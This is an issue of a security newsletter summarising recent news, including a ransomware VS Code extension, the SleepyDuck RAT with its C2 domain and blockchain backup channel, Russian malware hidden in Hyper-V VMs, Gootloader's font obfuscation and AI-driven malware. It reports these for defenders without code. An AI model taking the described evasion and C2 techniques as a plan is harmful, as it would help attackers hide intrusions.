🎓️ Vulnerable U | #141

Ransomvibing in extension marketplace, Google predictions from security in 2026, Russia targets Ukraine grain industry with cyber attack, and much more!

Read Time: 9 minutes

Brought to you by:

Hey! Thanks for being here.

Just got back from a cool event that Decibel put together in Miami - and while hearing from some of the industry’s leading CISOs and AI experts was cool and all, the highlight for me was meeting probably the pinnacle of my childhood idols, Derek Jeter. If you don’t know I’m born and raised in NY just outside the city and have been a life long, sometimes obsessive, Yankees fan. So there really isn’t anyone much higher on my list I’d be excited to meet then Jeter.

I got to ask him a question during his talk and I asked something along the lines of, “New York is one of the toughest towns to be an athlete…” - He interrupted me and emphasized THE toughest. - “You were a shining example of someone who excelled there for longer than most. What do you say to the young kids entering that spotlight and pressure cooker so they can survive?”

His answer was basically perfect. Paraphrasing: “Be accountable. The fans want to root for you. But if you have a bad game, you stand in front of your locker and answer the questions. I would talk to the media 2-3 times a day and sometimes players would sneak out after a bad game and then I’d have to be answering questions about them. If you’re going to sneak out, do it after a good game. Be accountable.”

I think this is good life advice outside of sports and felt like you’d all like to hear it. He’s a class act and an exceptional leader. During his talk he emphasized how important it was for him to feel prepared. In all aspects of his life he hates feeling unprepared. I think us security nerds can empathize there too.

ICYMI

🖊️ Something I wrote: Zero day developer has had an insider accused of selling secrets to Russia.

🎧️ Something I heard: ChatGPT made me delusional

🎤 Something I said: My run down of the FFmpeg drama

🔖 Something I read: Thomas Ptacek (@tqbf) - You Should Write An Agent

Vulnerable News

Someone just pushed actual ransomware to the VS Code marketplace and somehow Microsoft's review process missed it. The extension was hilariously obvious - literally called "suspicious VSX" by publisher "suspicious publisher" - but it still made it through. The malware encrypts files, uses GitHub as a C2 channel, and exfiltrates data, though thankfully it only targets a test directory by default. The developer accidentally included the decryption keys and even helpful instructions on how to re-run the encryption in the README.

This whole thing screams AI-generated code based on the comments and structure. The researcher who found it managed to trace it back to the actual developer through leaked system info that got uploaded via the C2 channel - turns out the dev's own machine info ended up in the GitHub repo. While this particular example is sloppy, it highlights a real problem: if something this blatantly malicious can slip through Microsoft's filters, what happens when someone builds a more real version? (read more)

In the last month, Island found that 52% of enterprises saw employees trying to upload corporate files to personal AI accounts.

It’s common because the place we work with AI wasn’t designed to work with AI.

Island’s Enterprise Browser changes that. It protects data at the prompt level before files or sensitive information ever feed into AI engines. That means employees can safely use any AI app, corporate or personal, while admins keep full control and visibility.

Can your browser do that? → [read more]

*Sponsored

Three cybersecurity insiders, including employees from DigitalMint and Sygnia, got caught running BlackCat ransomware operations against five US companies. Ryan Goldberg was an IR manager at Sygnia, while Kevin Martin and an unnamed accomplice worked as ransomware negotiators at DigitalMint. Just absolutely wild to be working as a ransomware negotiator and incident responder and deploying ransomware as a side hustle.

They hit healthcare, pharma, engineering, and drone manufacturing companies between May and November 2023, demanding ransoms from $300k to $10M. Only managed to squeeze $1.27M out of one victim though. Goldberg apparently cracked during FBI questioning, claiming he did it to clear some debts. Both named suspects are looking at up to 50 years in federal prison, while their mystery partner hasn't been indicted yet. Both companies have cut ties with the employees and are cooperating with law enforcement. (read more)

Russian-backed threat actors, Curly COMrades, figured out how to hide their malware inside tiny Hyper-V virtual machines on compromised Windows systems. They'd enable Hyper-V, drop in a 120MB Alpine Linux VM, and run their custom tools (CurlyShell and CurlCat) from inside this isolated environment. Pretty sneaky way to dodge EDR detection since most security tools can't see what's happening inside the VM.

Beyond the VM trick, they were injecting Kerberos tickets into LSASS for lateral movement and using Group Policy to create persistent local accounts across domain systems. While the VM isolation is clever, the network traffic still has to exit through the host, so network-based detection can still catch them. (read more)

I think it’s incredibly important we watch all the Russia vs Ukraine cyber activity as it shows a glimpse into modern warfare having both kinetic and cyber elements. I look at it the same way European generals came to study early American wars that involved firearms for the first time. Important to see how it changes the battlefield.

This new report shows Sandworm's going after Ukraine's grain industry with wiper malware. ESET researchers tracked the GRU-linked group deploying two wipers called Zerolot and Sting against Ukrainian grain, energy, logistics, and government targets between June and September. Agriculture hasn't been hit much directly before - it's a key export revenue source for Ukraine, so this feels like economic warfare ramped up a notch. (read more)

Google just dropped their annual crystal ball gazing session with the Cybersecurity Forecast 2026 report. The big theme this year, you’ll be shocked to find out, is about AI. They think, and I agree, it’s about to become table stakes for both attackers and defenders. Threat actors are moving from dabbling with AI to making it their bread and butter, voice cloning for social engineering and prompt injection attacks targeting enterprise AI systems. Meanwhile, the good guys are getting "Agentic SOCs" and 1000 other AI tools out both offensive and defensive to help with their workload.

On the crime front, ransomware crews are doubling down on targeting virtualization infrastructure (because why compromise one system when you can own the whole estate?) and moving their operations onto public blockchains for better resilience. Nation-state activity is predictably messy - Russia's pivoting from tactical Ukraine support to long-term strategic ops, China's still doing China things with high-volume stealthy campaigns, and North Korea keeps running their IT worker scams to fund the regime. Nothing groundbreaking here, but it's a solid roadmap for what's coming down the pike. (read more)

148 security analysts investigated real alerts with and without AI assistance. The AI-assisted group was 29% more accurate and 61% faster. Even skeptics changed their minds.

*Sponsored

Gootloader, a sophisticated JavaScript-based malware loader that threat actors commonly use to gain initial access, is back with some new tricks. It’s now using custom WOFF2 fonts to pull off some neat visual obfuscation - what looks like gibberish characters in the source code magically transforms into legitimate filenames when rendered in your browser. Think "‛›μI€vSO₽*'Oaμ==€‚‚33O%33‚€×[TM€v3cwv," displaying as "Florida_HOA_Committee_Meeting_Guide.pdf". Pretty slick way to defeat static analysis tools looking for suspicious keywords.

Huntress observed three infections where threat actors moved from initial JavaScript execution to reconnaissance in just 20 minutes, then achieved domain controller compromise within 17 hours. (Side note - I commonly advise security teams to drive towards a sub 20 minute response and containment time. Here is more ammo for me!) The attack patterns remain predictable though - AD enumeration, Kerberoasting, lateral movement via WinRM, then Volume Shadow Copy enumeration as ransomware prep. (read more)

Google analyzed five different AI-generated malware families and found them to be… shit. These samples - with names like PromptLock and FruitShell - were easily detected by basic security tools and had glaring gaps like missing persistence mechanisms and evasion tactics. One was literally part of an academic study that the researchers themselves admitted had "clear limitations."

Companies like Anthropic have been pushing narratives about advanced AI-powered ransomware, while startups claim AI is "lowering the bar" for threat actors. But when you actually look at what's being produced, it's mostly experimental junk that any decent endpoint protection can catch. As one researcher put it, if you were paying malware developers for this stuff, "you would be furiously asking for a refund." (read more)

GreyNoise decided to poke the bear and see if anyone's actively hunting MCP deployments in the wild. They spun up three different MCP honeypots - one open, one requiring API keys, and one with a deliberately exposed key to see who'd take the bait. All three got discovered within days (because everything on the internet gets found eventually), but here's the interesting part: zero MCP-specific attacks showed up. Just the usual background noise of HTTP probes and SSH pokes that hit literally everything online.

The real story here isn't what happened, but what didn't. That baseline of "normal internet noise" is actually valuable intel for defenders - it tells you what to expect before the bad guys start getting creative with AI middleware attacks. There was one controlled research demo of a prompt-hijacking bug in October, but that was just a proof-of-concept, not real-world exploitation. (read more)

Google's Threat Intelligence Group with a report showing we've hit a new milestone in AI abuse - threat actors are now deploying malware that calls AI APIs during execution. The standout here is PROMPTFLUX, experimental malware that uses Gemini's API to rewrite its own code every hour to evade detection, and PROMPTSTEAL, which APT28 (Russia's finest) used against Ukraine to generate system commands on-the-fly via Hugging Face APIs. This marks a shift from just using AI for productivity to actual "just-in-time" operational capabilities. (read more)

Japanese media giant Nikkei just disclosed a breach affecting over 17,000 people after hackers snagged Slack credentials from an employee's personal computer using infostealer malware. The attackers then used those stolen creds to access company Slack accounts and made off with names, email addresses, and chat histories. Hudson Rock actually tracked down the specific infostealer instance that likely did the deed - turns out this type of malware has compromised over 270,000 Slack credentials across various organizations. (read more)

Proofpoint researchers stumbled across a new Iranian threat actor they're calling UNK_SmudgedSerpent that's been targeting academics and policy experts with some interesting social engineering. The group is using lures about Iranian political developments to hook their targets. What started as benign conversations about Iran's societal changes quickly turned into credential harvesting attempts and RMM tool deployments. (read more)

Google's AI agent "Big Sleep" just scored a hat trick of vulns in Apple Safari's WebKit engine. The bugs include a buffer overflow, use-after-free, and several memory corruption issues that could crash Safari or worse. Apple rolled out patches across the board - iOS 26.1, macOS Tahoe 26.1, and basically every Apple device you can think of got an update this week. (go patch!)

This is actually pretty cool from a research perspective. Big Sleep (formerly Project Naptime) is Google's AI-powered bug hunter that's been making waves lately. Earlier this year it found a SQLite vulnerability, and now it's poking at WebKit. No evidence these bugs were exploited in the wild, but AI is getting better and better at finding the kind of bugs. (read more)

Heads up to anyone using Cursor or other VSCode-style editors - there's a new RAT called SleepyDuck making the rounds through Open VSX. It masquerades as a legit Solidity extension (juan-bianco.solidity-vlang). The attackers published a harmless version first, waited for 14,000 downloads, then pushed the malicious 0.0.8 update. Once installed, it activates when you open new editor windows or touch .sol files, then starts phoning home to sleepyduck[.]xyz every 30 seconds.

They are using an Ethereum contracts as backup C2 infrastructure. If their main server gets nuked, the malware can pull new commands and server addresses straight from the blockchain at contract address 0xDAfb81732db454DA238e9cFC9A9Fe5fb8e34c465. Secure Annex has tracked over 20 similar malicious Solidity extensions since July, all trying to fool developers into installing them. The extension marketplace really needs to get its act together, because this attack pattern is becoming way too common. (read more)

MIT Sloan just got schooled by security researcher Kevin Beaumont for publishing some truly awful research. Their working paper claimed that 80% of ransomware attacks in 2024 were "AI-driven" - a stat so ridiculous that even Google's AI Overview called BS on it. Beaumont tore the paper apart, pointing out it attributed AI to ransomware groups that don't even use it and mentioned Emotet as "AI driven" (Emotet's been dead for years). Marcus Hutchins piled on too, saying he "burst out laughing" at the methodology.

After Beaumont's public takedown, MIT quietly pulled the study and replaced it with a generic "we're updating based on recent reviews" message. The whole thing reeks of what Beaumont coined as "cyberslop" - trusted institutions making baseless AI threat claims to profit off perceived expertise. Doesn't help that some of the MIT authors sit on the board of Safe Security, the company that co-authored the research. (read more)

Mike Privette dug into three years of funding data and found that despite dominating headlines, AI security only represents 9% of cybersecurity deals and a measly 3% of total funding. His thesis is we're not seeing a revolution, we're watching good old-fashioned absorption. AI is getting baked into existing security categories the same way cloud did a decade ago.

The really interesting bit is the funding flip that happened in 2024. Money started flowing away from "Security for AI" (protecting AI systems) toward "AI for Security" (using AI to improve security tools), with the latter growing 624%. (read more)

Miscellaneous mattjay

How'd I do this edition?

It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.

Login or Subscribe to participate in polls.

Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay